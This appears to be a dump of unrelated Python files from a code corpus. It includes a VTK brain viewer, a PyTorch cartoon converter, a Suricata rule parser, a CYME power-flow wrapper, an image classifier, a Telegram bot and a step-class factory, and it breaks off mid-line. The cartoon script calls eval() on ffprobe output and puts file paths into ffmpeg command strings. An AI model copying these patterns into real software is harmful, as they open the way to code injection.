sum(self.brain.scalar_range) / 2, self.brain_threshold_vc)
self.brain_opacity_sp = self.create_new_picker(1.0, 0.0, 0.1, BRAIN_OPACITY, self.brain_opacity_vc)
self.brain_smoothness_sp = self.create_new_picker(1000, 100, 100, BRAIN_SMOOTHNESS, self.brain_smoothness_vc)
self.brain_lut_sp = self.create_new_picker(3.0, 0.0, 0.1, 2.0, self.lut_value_changed)
self.brain_projection_cb = self.add_brain_projection()
self.brain_slicer_cb = self.add_brain_slicer()
# mask pickers
self.mask_opacity_sp = self.create_new_picker(1.0, 0.0, 0.1, MASK_OPACITY, self.mask_opacity_vc)
self.mask_smoothness_sp = self.create_new_picker(1000, 100, 100, MASK_SMOOTHNESS, self.mask_smoothness_vc)
self.mask_label_cbs = []
# create grid for all widgets
self.grid = QtWidgets.QGridLayout()
# add each widget
self.add_vtk_window_widget()
self.add_brain_settings_widget()
self.add_mask_settings_widget()
self.add_views_widget()
# set layout and show
self.render_window.Render()
self.setWindowTitle(APPLICATION_TITLE)
self.frame.setLayout(self.grid)
self.setCentralWidget(self.frame)
self.set_axial_view()
self.interactor.Initialize()
self.show()
@staticmethod
def setup():
"""
Create and setup the base vtk and Qt objects for the application
"""
renderer = vtk.vtkRenderer()
frame = QtWidgets.QFrame()
vtk_widget = QVTKRenderWindowInteractor()
interactor = vtk_widget.GetRenderWindow().GetInteractor()
render_window = vtk_widget.GetRenderWindow()
frame.setAutoFillBackground(True)
vtk_widget.GetRenderWindow().AddRenderer(renderer)
render_window.AddRenderer(renderer)
interactor.SetRenderWindow(render_window)
interactor.SetInteractorStyle(vtk.vtkInteractorStyleTrackballCamera())
# required to enable overlapping actors with opacity < 1.0
# this is causing some issues with flashing objects
# render_window.SetAlphaBitPlanes(1)
# render_window.SetMultiSamples(0)
# renderer.UseDepthPeelingOn()
# renderer.SetMaximumNumberOfPeels(2)
return renderer, frame, vtk_widget, interactor, render_window
def lut_value_changed(self):
lut = self.brain.image_mapper.GetLookupTable()
new_lut_value = self.brain_lut_sp.value()
lut.SetValueRange(0.0, new_lut_value)
lut.Build()
self.brain.image_mapper.SetLookupTable(lut)
self.brain.image_mapper.Update()
self.render_window.Render()
def add_brain_slicer(self):
slicer_cb = QtWidgets.QCheckBox("Slicer")
slicer_cb.clicked.connect(self.brain_slicer_vc)
return slicer_cb
def add_vtk_window_widget(self):
base_brain_file = os.path.basename(self.app.BRAIN_FILE)
base_mask_file = os.path.basename(self.app.MASK_FILE)
object_title = "Brain: {0} (min: {1:.2f}, max: {2:.2f}) Mask: {3}".format(base_brain_file,
self.brain.scalar_range[0],
self.brain.scalar_range[1],
base_mask_file)
object_group_box = QtWidgets.QGroupBox(object_title)
object_layout = QtWidgets.QVBoxLayout()
object_layout.addWidget(self.vtk_widget)
object_group_box.setLayout(object_layout)
self.grid.addWidget(object_group_box, 0, 2, 5, 5)
# must manually set column width for vtk_widget to maintain height:width ratio
self.grid.setColumnMinimumWidth(2, 700)
def add_brain_settings_widget(self):
brain_group_box = QtWidgets.QGroupBox("Brain Settings")
brain_group_layout = QtWidgets.QGridLayout()
brain_group_layout.addWidget(QtWidgets.QLabel("Brain Threshold"), 0, 0)
brain_group_layout.addWidget(QtWidgets.QLabel("Brain Opacity"), 1, 0)
brain_group_layout.addWidget(QtWidgets.QLabel("Brain Smoothness"), 2, 0)
brain_group_layout.addWidget(QtWidgets.QLabel("Image Intensity"), 3, 0)
brain_group_layout.addWidget(self.brain_threshold_sp, 0, 1, 1, 2)
brain_group_layout.addWidget(self.brain_opacity_sp, 1, 1, 1, 2)
brain_group_layout.addWidget(self.brain_smoothness_sp, 2, 1, 1, 2)
brain_group_layout.addWidget(self.brain_lut_sp, 3, 1, 1, 2)
brain_group_layout.addWidget(self.brain_projection_cb, 4, 0)
brain_group_layout.addWidget(self.brain_slicer_cb, 4, 1)
brain_group_layout.addWidget(self.create_new_separator(), 5, 0, 1, 3)
brain_group_layout.addWidget(QtWidgets.QLabel("Axial Slice"), 6, 0)
brain_group_layout.addWidget(QtWidgets.QLabel("Coronal Slice"), 7, 0)
brain_group_layout.addWidget(QtWidgets.QLabel("Sagittal Slice"), 8, 0)
# order is important
slicer_funcs = [self.axial_slice_changed, self.coronal_slice_changed, self.sagittal_slice_changed]
current_label_row = 6
        # data extent is array [xmin, xmax, ymin, ymax, zmin, zmax]
# we want all the max values for the range
extent_index = 5
for func in slicer_funcs:
slice_widget = QtWidgets.QSlider(Qt.Qt.Horizontal)
slice_widget.setDisabled(True)
self.slicer_widgets.append(slice_widget)
brain_group_layout.addWidget(slice_widget, current_label_row, 1, 1, 2)
slice_widget.valueChanged.connect(func)
slice_widget.setRange(self.brain.extent[extent_index - 1], self.brain.extent[extent_index])
            slice_widget.setValue(self.brain.extent[extent_index] // 2)
current_label_row += 1
extent_index -= 2
brain_group_box.setLayout(brain_group_layout)
self.grid.addWidget(brain_group_box, 0, 0, 1, 2)
def axial_slice_changed(self):
pos = self.slicer_widgets[0].value()
self.brain_slicer_props[0].SetDisplayExtent(self.brain.extent[0], self.brain.extent[1], self.brain.extent[2],
self.brain.extent[3], pos, pos)
self.render_window.Render()
def coronal_slice_changed(self):
pos = self.slicer_widgets[1].value()
self.brain_slicer_props[1].SetDisplayExtent(self.brain.extent[0], self.brain.extent[1], pos, pos,
self.brain.extent[4], self.brain.extent[5])
self.render_window.Render()
def sagittal_slice_changed(self):
pos = self.slicer_widgets[2].value()
self.brain_slicer_props[2].SetDisplayExtent(pos, pos, self.brain.extent[2], self.brain.extent[3],
self.brain.extent[4], self.brain.extent[5])
self.render_window.Render()
def add_mask_settings_widget(self):
mask_settings_group_box = QtWidgets.QGroupBox("Mask Settings")
mask_settings_layout = QtWidgets.QGridLayout()
mask_settings_layout.addWidget(QtWidgets.QLabel("Mask Opacity"), 0, 0)
mask_settings_layout.addWidget(QtWidgets.QLabel("Mask Smoothness"), 1, 0)
mask_settings_layout.addWidget(self.mask_opacity_sp, 0, 1)
mask_settings_layout.addWidget(self.mask_smoothness_sp, 1, 1)
mask_multi_color_radio = QtWidgets.QRadioButton("Multi Color")
mask_multi_color_radio.setChecked(True)
mask_multi_color_radio.clicked.connect(self.mask_multi_color_radio_checked)
mask_single_color_radio = QtWidgets.QRadioButton("Single Color")
mask_single_color_radio.clicked.connect(self.mask_single_color_radio_checked)
mask_settings_layout.addWidget(mask_multi_color_radio, 2, 0)
mask_settings_layout.addWidget(mask_single_color_radio, 2, 1)
mask_settings_layout.addWidget(self.create_new_separator(), 3, 0, 1, 2)
self.mask_label_cbs = []
c_col, c_row = 0, 4 # c_row must always be (+1) of last row
for i in range(1, 11):
self.mask_label_cbs.append(QtWidgets.QCheckBox("Label {}".format(i)))
mask_settings_layout.addWidget(self.mask_label_cbs[i - 1], c_row, c_col)
c_row = c_row + 1 if c_col == 1 else c_row
c_col = 0 if c_col == 1 else 1
mask_settings_group_box.setLayout(mask_settings_layout)
self.grid.addWidget(mask_settings_group_box, 1, 0, 2, 2)
for i, cb in enumerate(self.mask_label_cbs):
if i < len(self.mask.labels) and self.mask.labels[i].actor:
cb.setChecked(True)
cb.clicked.connect(self.mask_label_checked)
else:
cb.setDisabled(True)
def add_views_widget(self):
axial_view = QtWidgets.QPushButton("Axial")
coronal_view = QtWidgets.QPushButton("Coronal")
sagittal_view = QtWidgets.QPushButton("Sagittal")
views_box = QtWidgets.QGroupBox("Views")
views_box_layout = QtWidgets.QVBoxLayout()
views_box_layout.addWidget(axial_view)
views_box_layout.addWidget(coronal_view)
views_box_layout.addWidget(sagittal_view)
views_box.setLayout(views_box_layout)
self.grid.addWidget(views_box, 3, 0, 2, 2)
axial_view.clicked.connect(self.set_axial_view)
coronal_view.clicked.connect(self.set_coronal_view)
sagittal_view.clicked.connect(self.set_sagittal_view)
@staticmethod
def create_new_picker(max_value, min_value, step, picker_value, value_changed_func):
if isinstance(max_value, int):
picker = QtWidgets.QSpinBox()
else:
picker = QtWidgets.QDoubleSpinBox()
picker.setMaximum(max_value)
picker.setMinimum(min_value)
picker.setSingleStep(step)
picker.setValue(picker_value)
picker.valueChanged.connect(value_changed_func)
return picker
def add_brain_projection(self):
projection_cb = QtWidgets.QCheckBox("Projection")
projection_cb.clicked.connect(self.brain_projection_vc)
return projection_cb
def mask_label_checked(self):
for i, cb in enumerate(self.mask_label_cbs):
if cb.isChecked():
self.mask.labels[i].property.SetOpacity(self.mask_opacity_sp.value())
elif cb.isEnabled(): # labels without data are disabled
self.mask.labels[i].property.SetOpacity(0)
self.render_window.Render()
def mask_single_color_radio_checked(self):
for label in self.mask.labels:
if label.property:
label.property.SetColor(MASK_COLORS[0])
self.render_window.Render()
def mask_multi_color_radio_checked(self):
for label in self.mask.labels:
if label.property:
label.property.SetColor(label.color)
self.render_window.Render()
def brain_projection_vc(self):
projection_checked = self.brain_projection_cb.isChecked()
        self.brain_slicer_cb.setDisabled(projection_checked)  # disable slicer checkbox, can't use both at the same time
self.brain_image_prop.SetOpacity(projection_checked)
self.render_window.Render()
def brain_slicer_vc(self):
slicer_checked = self.brain_slicer_cb.isChecked()
for widget in self.slicer_widgets:
widget.setEnabled(slicer_checked)
        self.brain_projection_cb.setDisabled(slicer_checked)  # disable projection checkbox, can't use both at the same time
for prop in self.brain_slicer_props:
prop.GetProperty().SetOpacity(slicer_checked)
self.render_window.Render()
def brain_opacity_vc(self):
opacity = round(self.brain_opacity_sp.value(), 2)
self.brain.labels[0].property.SetOpacity(opacity)
self.render_window.Render()
def brain_threshold_vc(self):
self.process_changes()
threshold = self.brain_threshold_sp.value()
self.brain.labels[0].extractor.SetValue(0, threshold)
self.render_window.Render()
def brain_smoothness_vc(self):
self.process_changes()
smoothness = self.brain_smoothness_sp.value()
self.brain.labels[0].smoother.SetNumberOfIterations(smoothness)
self.render_window.Render()
def mask_opacity_vc(self):
opacity = round(self.mask_opacity_sp.value(), 2)
for i, label in enumerate(self.mask.labels):
if label.property and self.mask_label_cbs[i].isChecked():
label.property.SetOpacity(opacity)
self.render_window.Render()
def mask_smoothness_vc(self):
self.process_changes()
smoothness = self.mask_smoothness_sp.value()
for label in self.mask.labels:
if label.smoother:
label.smoother.SetNumberOfIterations(smoothness)
self.render_window.Render()
def set_axial_view(self):
self.renderer.ResetCamera()
fp = self.renderer.GetActiveCamera().GetFocalPoint()
p = self.renderer.GetActiveCamera().GetPosition()
dist = math.sqrt((p[0] - fp[0]) ** 2 + (p[1] - fp[1]) ** 2 + (p[2] - fp[2]) ** 2)
self.renderer.GetActiveCamera().SetPosition(fp[0], fp[1], fp[2] + dist)
self.renderer.GetActiveCamera().SetViewUp(0.0, 1.0, 0.0)
self.renderer.GetActiveCamera().Zoom(1.8)
self.render_window.Render()
def set_coronal_view(self):
self.renderer.ResetCamera()
fp = self.renderer.GetActiveCamera().GetFocalPoint()
p = self.renderer.GetActiveCamera().GetPosition()
dist = math.sqrt((p[0] - fp[0]) ** 2 + (p[1] - fp[1]) ** 2 + (p[2] - fp[2]) ** 2)
self.renderer.GetActiveCamera().SetPosition(fp[0], fp[2] - dist, fp[1])
self.renderer.GetActiveCamera().SetViewUp(0.0, 0.5, 0.5)
self.renderer.GetActiveCamera().Zoom(1.8)
self.render_window.Render()
def set_sagittal_view(self):
self.renderer.ResetCamera()
fp = self.renderer.GetActiveCamera().GetFocalPoint()
p = self.renderer.GetActiveCamera().GetPosition()
dist = math.sqrt((p[0] - fp[0]) ** 2 + (p[1] - fp[1]) ** 2 + (p[2] - fp[2]) ** 2)
self.renderer.GetActiveCamera().SetPosition(fp[2] + dist, fp[0], fp[1])
self.renderer.GetActiveCamera().SetViewUp(0.0, 0.0, 1.0)
self.renderer.GetActiveCamera().Zoom(1.6)
self.render_window.Render()
@staticmethod
def create_new_separator():
horizontal_line = QtWidgets.QWidget()
horizontal_line.setFixedHeight(1)
horizontal_line.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
horizontal_line.setStyleSheet("background-color: #c8c8c8;")
return horizontal_line
def process_changes(self):
for _ in range(10):
self.app.processEvents()
time.sleep(0.1)
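# Hedged launch sketch (an assumption, not part of the original file): MainWindow
# expects an application object that exposes BRAIN_FILE and MASK_FILE attributes
# pointing at the input volumes; the paths below are placeholders only.
if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    app.BRAIN_FILE = "path/to/brain.nii.gz"  # placeholder path
    app.MASK_FILE = "path/to/mask.nii.gz"  # placeholder path
    window = MainWindow(app)
    sys.exit(app.exec_())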
|
456819
|
from PIL import Image
import argparse
import os
import mimetypes
from utils.transforms import get_no_aug_transform
import torch
from models.generator import Generator
import numpy as np
import torchvision.transforms.functional as TF
import torch.nn.functional as F
from torchvision import transforms
import cv2
from torchvision import utils as vutils
import subprocess
import tempfile
import re
from tqdm import tqdm
import time
def inv_normalize(img):
    # Undo the ImageNet channel normalization applied by the input transform
mean = torch.Tensor([0.485, 0.456, 0.406]).to(device)
std = torch.Tensor([0.229, 0.224, 0.225]).to(device)
img = img * std.view(1, 3, 1, 1) + mean.view(1, 3, 1, 1)
img = img.clamp(0, 1)
return img
def predict_images(image_list):
trf = get_no_aug_transform()
image_list = torch.from_numpy(np.array([trf(img).numpy() for img in image_list])).to(device)
with torch.no_grad():
generated_images = netG(image_list)
generated_images = inv_normalize(generated_images)
pil_images = []
for i in range(generated_images.size()[0]):
generated_image = generated_images[i].cpu()
pil_images.append(TF.to_pil_image(generated_image))
return pil_images
def listdir_fullpath(d):
return [os.path.join(d, f) for f in os.listdir(d)]
def divide_chunks(l, n):
# looping till length l
for i in range(0, len(l), n):
yield l[i:i + n]
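# Quick doctest-style illustration of divide_chunks (values are made up):
# >>> list(divide_chunks([1, 2, 3, 4, 5], 2))
# [[1, 2], [3, 4], [5]]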
def predict_file(input_path, output_path):
# File is image
if mimetypes.guess_type(input_path)[0].startswith("image"):
image = Image.open(input_path).convert('RGB')
predicted_image = predict_images([image])[0]
predicted_image.save(output_path)
# File is video
elif mimetypes.guess_type(input_path)[0].startswith("video"):
# Create temp folder for storing frames as images
temp_dir = tempfile.TemporaryDirectory()
# Extract frames from video
subprocess.run(f"ffmpeg -i \"{input_path}\" -loglevel error -stats \"{os.path.join(temp_dir.name, 'frame_%07d.png')}\"")
# Process images with model
frame_paths = listdir_fullpath(temp_dir.name)
batches = [*divide_chunks(frame_paths, batch_size)]
for path_chunk in tqdm(batches):
imgs = [Image.open(p) for p in path_chunk]
imgs = predict_images(imgs)
for path, img in zip(path_chunk, imgs):
img.save(path)
# Get video frame rate
frame_rate = subprocess.check_output(f"ffprobe -v error -select_streams v -of default=noprint_wrappers=1:nokey=1 -show_entries stream=r_frame_rate \"{input_path}\"")
frame_rate = eval(frame_rate.split()[0]) # Dirty eval
# Combine frames with original audio
subprocess.run(f"ffmpeg -y -r {frame_rate} -i \"{os.path.join(temp_dir.name, 'frame_%07d.png')}\" -i \"{input_path}\" -map 0:v -map 1:a? -loglevel error -stats \"{output_path}\"")
else:
raise IOError("Invalid file extension.")
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="This file is used to convert images/videos to cartoons.")
parser.add_argument("-i", "--input", type=str, required=True, help="Path to file (image/video) or path to folder containing multiple images.")
parser.add_argument("-o", "--output", type=str, required=True, help="Where predicted images/videos should be saved. If --input is a single file, --output should be a single file as well.")
parser.add_argument("-d", "--device", type=str, default="cuda")
parser.add_argument("-b", "--batch_size", type=int, default=4)
input_path, output_path, user_stated_device, batch_size = vars(parser.parse_args()).values()
device = torch.device(user_stated_device)
pretrained_dir = "./checkpoints/trained_netG.pth"
netG = Generator().to(device)
netG.eval()
# Load weights
if user_stated_device == "cuda":
netG.load_state_dict(torch.load(pretrained_dir))
else:
netG.load_state_dict(torch.load(pretrained_dir, map_location=torch.device('cpu')))
# Single file
if os.path.isfile(input_path):
predict_file(input_path, output_path)
# Multiple files
else:
os.makedirs(output_path, exist_ok=True)
for file_name in tqdm(os.listdir(input_path), desc="Processing files"):
file_path = os.path.join(input_path, file_name)
output_file_path = os.path.join(output_path, file_name)
predict_file(file_path, output_file_path)
|
456846
|
import math
from mks.models import Member
from persons.models import Person, PersonAlias
# from: http://www.cs.princeton.edu/introcs/21function/ErrorFunction.java.html
# Implements the Gauss error function.
# erf(z) = 2 / sqrt(pi) * integral(exp(-t*t), t = 0..z)
#
# fractional error in math formula less than 1.2 * 10 ^ -7.
# although subject to catastrophic cancellation when z is very close to 0
# from Chebyshev fitting formula for erf(z) from Numerical Recipes, 6.2
def erf(z):
t = 1.0 / (1.0 + 0.5 * abs(z))
# use Horner's method
ans = 1 - t * math.exp( -z*z - 1.26551223 +
t * ( 1.00002368 +
t * ( 0.37409196 +
t * ( 0.09678418 +
t * (-0.18628806 +
t * ( 0.27886807 +
t * (-1.13520398 +
t * ( 1.48851587 +
t * (-0.82215223 +
t * ( 0.17087277))))))))))
if z >= 0.0:
return ans
else:
return -ans
def percentile(avg,var,val):
if not var:
return 50
z = (val-avg)/math.sqrt(var)
p = erf(z)/2.0*100.0+50.0
p = int(round(p))
p = min(100,p)
p = max(0,p)
return p
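# Worked illustration (doctest-style) of the helpers above; the numbers follow
# directly from the formulas as implemented here:
# >>> round(erf(1.0), 4)
# 0.8427
# >>> percentile(avg=0.0, var=1.0, val=1.0)  # erf(1)/2*100 + 50, rounded
# 92
# >>> percentile(avg=5.0, var=0.0, val=7.0)  # zero variance falls back to 50
# 50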
def get_all_mk_names():
# TODO: refactor all places to point directly to knesset_data_django
from knesset_data_django.mks.utils import get_all_mk_names
return get_all_mk_names()
|
456887
|
import elasticsearch
import argparse
import re
def parse_rule_line(rule_line):
"""
Parse each rule line and return a dict representation of a rule
:param rule_line:
:return: rule dict
"""
rule_dict = {}
    rule_info = re.search(r"\((.*)\)", rule_line).group(1)
msg_sections = rule_info.split(';')
# Get the rule action
rule_dict['action'] = rule_line.split()[0]
# Get the rule headers
rule_dict['headers'] = rule_line.split("(")[0].replace(rule_dict["action"], "").strip()
# Get the rest of the rule options
for section in msg_sections:
if len(section) > 0:
# print(repr(section))
split_section = section.split(':')
section_key = split_section[0].strip()
if len(split_section) > 1:
section_value = split_section[1].strip()
if "," in section_value:
rule_dict[section_key] = [i.strip() for i in section_value.split(',')]
else:
rule_dict[section_key] = section_value
else:
rule_dict[section_key] = ""
return rule_dict
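# Illustration with a made-up rule line (doctest-style, shown with Python 3.7+
# dict ordering):
# >>> parse_rule_line('alert tcp $EXTERNAL_NET any -> $HOME_NET 22 '
# ... '(msg:"Example SSH probe"; sid:1000001; rev:1;)')
# {'action': 'alert', 'headers': 'tcp $EXTERNAL_NET any -> $HOME_NET 22',
# 'msg': '"Example SSH probe"', 'sid': '1000001', 'rev': '1'}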
def parse_rules(filename="/etc/suricata/rules/downloaded.rules"):
"""
:param filename: the rule file to parse
Parse the rule file to use in reporting
:return: rule_dict: return a dict of rule_id:rule
"""
rules_dict = {}
rule_file = open(filename, 'r')
for line in rule_file:
if not line.startswith("#") and line != "\n":
rule = parse_rule_line(line.strip())
rules_dict[rule['sid']] = rule
return rules_dict
if __name__ == '__main__':
pass
|
456918
|
import cympy
import pandas
class Substation(object):
""""""
def __init__(self, model_filename):
""""""
# Open the model
self.model_filename = model_filename
cympy.study.Open(self.model_filename)
def baseload_allocation(self, feeder_loads):
"""Allocate load with respect to the total demand recorded"""
# Create Load Allocation object
la = cympy.sim.LoadAllocation()
for feeder in list(feeder_loads.keys()):
# Create the Demand object
demand = cympy.sim.Meter()
demand.LoadValueType = cympy.enums.LoadValueType.KW_PF
# Fill in the demand values
demand.IsTotalDemand = False
demand.DemandA = cympy.sim.LoadValue()
demand.DemandA.Value1 = feeder_loads[feeder]['MW'] * 1000 / 3.0
demand.DemandA.Value2 = 98
demand.DemandB = cympy.sim.LoadValue()
demand.DemandB.Value1 = feeder_loads[feeder]['MW'] * 1000 / 3.0
demand.DemandB.Value2 = 98
demand.DemandC = cympy.sim.LoadValue()
demand.DemandC.Value1 = feeder_loads[feeder]['MW'] * 1000 / 3.0
demand.DemandC.Value2 = 98
# Set the first feeders demand
la.SetDemand(feeder, demand)
# Run the load allocation
la.Run(list(feeder_loads.keys()))
def add_power_devices(self, node_ids, network_ids, device_ids):
""""""
# Add section with spot loads
for node, network, device in zip(node_ids, network_ids, device_ids):
new_section = cympy.study.AddSection('MYSECTION' + device, # Section ID
network, # Network ID
device, # Load ID
cympy.enums.DeviceType.SpotLoad,
node, # Node ID
'NEW_NODE_from' + node)
def set_power_devices(self, device_ids, values):
""""""
# Get active load model
activeLoadModel = cympy.study.GetActiveLoadModel()
for device_id, value in zip(device_ids, values):
# Get device
device = cympy.study.GetDevice(device_id, cympy.enums.DeviceType.SpotLoad)
# Get the number of phases for the device
section = cympy.study.GetSection(device.SectionID)
nb_phases = int(len(section.GetValue("Phase")))
# Add load value divided by the number of phases
for phase in range(0, nb_phases):
cympy.study.SetValueDevice(float(value) / nb_phases, # Load value
'CustomerLoads[0].CustomerLoadModels.Get(' +
str(activeLoadModel.ID) + ').' + # Active load model (August)
'CustomerLoadValues[' + str(phase) + # Phase
'].LoadValue.KW', # Parameter to set
device_id, # Load ID
cympy.enums.DeviceType.SpotLoad) # Load type
def run_powerflow(self, feeders):
""""""
# Run the power flow
lf = cympy.sim.LoadFlow()
lf.Run(list(feeders))
def list_nodes(self):
"""List all the nodes
Return:
            a DataFrame with node_id, section_id, network_id, latitude, longitude and distance
"""
# Get all nodes
nodes = cympy.study.ListNodes()
# Create a frame
nodes = pandas.DataFrame(nodes, columns=['node_object'])
nodes['node_id'] = nodes['node_object'].apply(lambda x: x.ID)
nodes['section_id'] = [0] * len(nodes)
nodes['network_id'] = [0] * len(nodes)
nodes['latitude'] = [0] * len(nodes)
nodes['longitude'] = [0] * len(nodes)
nodes['distance'] = [0] * len(nodes)
for node in nodes.itertuples():
nodes.loc[node.Index, 'section_id'] = cympy.study.QueryInfoNode("SectionId", node.node_id)
nodes.loc[node.Index, 'latitude'] = cympy.study.QueryInfoNode("CoordY", node.node_id)
nodes.loc[node.Index, 'longitude'] = cympy.study.QueryInfoNode("CoordX", node.node_id)
nodes.loc[node.Index, 'distance'] = cympy.study.QueryInfoNode("Distance", node.node_id)
nodes.loc[node.Index, 'network_id'] = cympy.study.QueryInfoNode("NetworkId", node.node_id)
# Cast the right type
for column in ['latitude']:
            nodes[column] = nodes[column].apply(lambda x: None if x == '' else float(x) / (1.26 * 100000))
# Cast the right type
for column in ['longitude']:
            nodes[column] = nodes[column].apply(lambda x: None if x == '' else float(x) / (100000))
# Cast the right type
for column in ['distance']:
            nodes[column] = nodes[column].apply(lambda x: None if x == '' else float(x))
return nodes
def get_voltage(self, frame):
"""
Args:
            frame (DataFrame): the devices or nodes to include
Return:
            voltage (DataFrame): the input frame with its corresponding voltage for
each phase
"""
# Create a new frame to hold the results
voltage = frame.copy()
# Reset or create new columns to hold the result
voltage['voltage_A'] = [0] * len(voltage)
voltage['voltage_B'] = [0] * len(voltage)
voltage['voltage_C'] = [0] * len(voltage)
for value in frame.itertuples():
# Get the according voltage per phase in a pandas dataframe
voltage.loc[value.Index, 'voltage_A'] = cympy.study.QueryInfoNode("VpuA", value.node_id)
voltage.loc[value.Index, 'voltage_B'] = cympy.study.QueryInfoNode("VpuB", value.node_id)
voltage.loc[value.Index, 'voltage_C'] = cympy.study.QueryInfoNode("VpuC", value.node_id)
# Cast the right type
for column in ['voltage_A', 'voltage_B', 'voltage_C']:
            voltage[column] = voltage[column].apply(lambda x: None if x == '' else float(x))
return voltage
def get_voltage_from_node_ids(self, node_ids):
"""
Args:
node_ids (List): node ids
Return:
node_voltage (List)
"""
voltages = []
for node_id in node_ids:
voltages.append(cympy.study.QueryInfoNode("Vpu", node_id))
return voltages
def get_info_node(self, node, info):
""""""
return cympy.study.QueryInfoNode(info, node)
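# Usage sketch under stated assumptions: cympy is only available inside a CYME
# environment, and "example_model.sxst" plus the feeder/demand figures below are
# placeholders rather than data from this project.
if __name__ == "__main__":
    example_feeder_loads = {"FEEDER_A": {"MW": 4.2}, "FEEDER_B": {"MW": 3.1}}
    substation = Substation("example_model.sxst")
    substation.baseload_allocation(example_feeder_loads)
    substation.run_powerflow(example_feeder_loads.keys())
    print(substation.list_nodes().head())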
|
456925
|
from abc import ABC, abstractmethod
from pathlib import Path
from typing import List
from novelsave.core.entities.novel import Novel
class BasePackager(ABC):
@property
@abstractmethod
def priority(self):
"""Determines the order in which the packager must be called. Lowest first"""
@abstractmethod
def keywords(self) -> List[str]:
"""keywords that identify this packager. for example, output format"""
@abstractmethod
def package(self, novel: Novel) -> Path:
"""package the a select novel from the database into another format."""
@abstractmethod
def destination(self, novel: Novel) -> Path:
"""provide file or directory where the novel has been packaged to, file is preferred."""
|
456935
|
import os
import utils
import config
import traceback
import argparse
import logging.config
from luna import LunaExcepion
logging.config.fileConfig("logging.conf")
logger = logging.getLogger()
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--image', required=True, help='input an image to predict')
return parser.parse_args()
if __name__ == '__main__':
try:
logger.info("------ start ------")
utils.lock()
args = parse_args()
if not os.path.exists(args.image):
raise LunaExcepion(config.inputerr)
from keras.applications.vgg16 import VGG16, preprocess_input, decode_predictions
from keras.preprocessing import image
import numpy as np
        # Load the pre-trained VGG16 model
        # The pre-trained weights are loaded along with the architecture
model = VGG16(weights='imagenet')
        # Load the image and convert it to a 4D tensor
img = image.load_img(args.image, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
        # Predict the classes
        # The input is a single image, so take only element [0]
preds = model.predict(preprocess_input(x))
        # Print the top 5 predictions by probability
results = decode_predictions(preds, top=5)[0]
data = []
for result in results:
            data.append({"name": result[1], "percentage": '%.10f' % (result[2] * 100)})
print({"error": "", "data": data})
except (KeyboardInterrupt, SystemExit):
utils.unlock()
utils.error(config.syserr)
except LunaExcepion as e:
utils.error(e.value)
if (e.value == config.locked):
exit()
logger.info("------ end ------")
except Exception as e:
logger.error(e)
logger.error(traceback.format_exc())
utils.error(config.syserr)
utils.unlock()
logger.info("------ end ------")
|
456947
|
import logging
from telegram import Update
from telegram.ext import CommandHandler, Updater, CallbackContext
logger = logging.getLogger(__name__)
def add_core(upd: Updater, core_handlers_group: int):
logger.info("register smile-mode handlers")
dp = upd.dispatcher
dp.add_handler(CommandHandler("start", start, run_async=True), core_handlers_group)
dp.add_handler(CommandHandler("help", help_, run_async=True), core_handlers_group)
def start(update: Update, _: CallbackContext):
update.message.reply_text(
"I'm a VLDC Bot. 😼\n\n" "My source: https://github.com/vldc-hq/vldc-bot"
)
def help_(update: Update, _: CallbackContext):
"""List of ALL commands"""
update.message.reply_text(
"The bot should be an admin with all admins permissions\n\n"
"Skills for admins:\n\n"
"SmileMode: allows only not text messages (stickers, GIFs)\n"
"`/smile_mode_on` – smile mode ON\n"
"`/smile_mode_off` – smile mode OFF\n"
"\n"
"Version: just version\n"
"`/version` – show current version of the bot\n"
"\n\n"
"Skills for all:\n\n"
"SinceMode: when the last time we ware discuss this topic?\n"
"`/since TOPIC` – update topic counter\n"
"`/since_list` – list off all hot topics\n"
"for example:\n"
" >>> alice: нет, ну современный пхп вполне нормальный язык\n"
" >>> bob: /since современный пыхыпы\n"
" >>> Nayn: 0 days without «современный пыхыпы»! Already was discussed 47 times\n"
" >>> alice: -__-\n"
"\n\n"
"Passive:\n"
"TowelMode: required reply from new users otherwise blacklisted them\n"
"TowelMode is ON by default\n\n"
"Feel free to add more stuff!\n"
"\nhttps://github.com/vldc-hq/vldc-bot/issues\n"
"\n\n"
)
def error(update: Update, context: CallbackContext):
"""Log Errors caused by Updates"""
logger.warning('Update "%s" caused error "%s"', update, context.error)
|
456974
|
import warnings
from types import FrameType
from typing import Optional, Dict, Any, cast
__all__ = ["make_step"]
import inspect
from baikal.steps import Step
def make_step(
base_class: type, attr_dict: Dict[str, Any] = None, class_name: Optional[str] = None
) -> type:
"""Creates a step subclass from the given base class.
For example, calling::
PCA = make_step(sklearn.decomposition.PCA, class_name="PCA")
is equivalent to::
class PCA(Step, sklearn.decomposition.PCA):
def __init__(self, *args, name=None, n_outputs=1, **kwargs):
super().__init__(*args, name=name, n_outputs=n_outputs, **kwargs)
Parameters
----------
base_class
The base class to inherit from. It must implement the scikit-learn API.
attr_dict
Dictionary of additional attributes for the class. You can use this to add
methods such as ``fit_compute`` to the class. (keys: name of attribute (``str``),
values: attributes).
class_name
Name of the step class. If None, the name will be the name of the given
base class. For instances made from the generated class to be pickle-able,
you must pass a name that matches the name of the variable the generated
class is being assigned to (the variable must also be declared at the top
level of the module). **Deprecation notice**: This argument will be required
from version 0.5.0.
Returns
-------
step_subclass
        A new class that inherits from both Step and the given base class and has
        the specified attributes.
"""
def __init__(self, *args, name=None, n_outputs=1, **kwargs):
super(self.__class__, self).__init__(
*args, name=name, n_outputs=n_outputs, **kwargs,
)
metaclass = type(base_class)
if class_name is None:
warnings.warn(
"Pass a string to `class_name`. From version 0.5.0 this argument will be"
" required.",
FutureWarning,
)
name = base_class.__name__
else:
name = class_name
bases = (Step, base_class)
caller_frame = cast(FrameType, cast(FrameType, inspect.currentframe()).f_back)
caller_module = caller_frame.f_globals["__name__"]
dict = {"__init__": __init__, "__module__": caller_module}
if attr_dict is not None:
dict.update(attr_dict)
step_subclass = metaclass(name, bases, dict)
return step_subclass
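# Hedged usage sketch (assumes scikit-learn is installed; the fit_compute helper
# below only illustrates attr_dict and is not baikal's own definition):
if __name__ == "__main__":
    import sklearn.linear_model
    def fit_compute(self, X, y):
        # fit the wrapped estimator, then return its predictions on X
        self.fit(X, y)
        return self.predict(X)
    LogisticRegression = make_step(
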